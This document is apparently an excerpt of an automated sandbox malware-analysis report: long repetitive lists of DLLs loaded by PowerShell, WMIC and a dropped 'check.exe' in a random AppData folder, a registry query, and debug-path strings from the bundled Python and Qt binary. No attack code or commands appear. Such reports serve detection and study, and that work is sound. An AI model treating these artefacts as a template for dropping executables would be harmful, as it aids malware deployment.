Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: libffi-8.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: qt5core.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: msvcp140_1.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: libcrypto-3.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: libssl-3.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: qt5widgets.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: libffi-8.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: qt5core.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: msvcp140_1.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: libcrypto-3.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: libssl-3.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: qt5widgets.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: libffi-8.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: qt5core.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: msvcp140_1.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: libcrypto-3.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: libssl-3.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: qt5widgets.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: download.ps1 Static file information: File size 51289381 > 1048576
Source: Binary string: C:\Users\qt\work\qt\qtsvg\plugins\iconengines\qsvgicon.pdb source: check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtsvg\plugins\imageformats\qsvg.pdb source: check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: check.exe, 00000005.00000002.2761324036.00007FF8B83B5000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.2223434926.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: check.exe, 00000005.00000002.2749724831.00007FF89F1D2000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: check.exe, 00000004.00000003.2254086538.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2763315652.00007FF8BFBA4000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: check.exe, 00000004.00000003.2206358241.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762439180.00007FF8BA4F5000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: check.exe, 00000004.00000003.2254233123.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb%% source: check.exe, 00000005.00000002.2760252195.00007FF8B8277000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb source: check.exe, 00000005.00000002.2760252195.00007FF8B8277000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: check.exe, 00000005.00000002.2763117904.00007FF8BFB73000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: check.exe, 00000004.00000003.2254830143.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2761899392.00007FF8B8CB6000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.2223434926.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdbT source: check.exe, 00000005.00000002.2750673646.00007FF89F7A6000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Gui.pdb source: check.exe, 00000005.00000002.2743333905.00007FF89DF9A000.00000002.00000001.01000000.00000024.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: check.exe, 00000004.00000003.2254947920.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762068252.00007FF8B90EB000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: check.exe, 00000004.00000003.2254329878.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762795539.00007FF8BA51D000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: check.exe, 00000004.00000003.2255169584.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2760981184.00007FF8B8319000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: check.exe, 00000005.00000002.2758624413.00007FF89FF78000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: check.exe, 00000004.00000003.2254233123.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000004.00000003.2205718666.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdbBB source: check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\platformthemes\qxdgdesktopportal.pdb source: check.exe, 00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: check.exe, 00000004.00000003.2263045929.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2747911281.00007FF89ED47000.00000002.00000001.01000000.00000020.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: check.exe, 00000004.00000003.2195204413.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762606642.00007FF8BA503000.00000002.00000001.01000000.00000014.sdmp
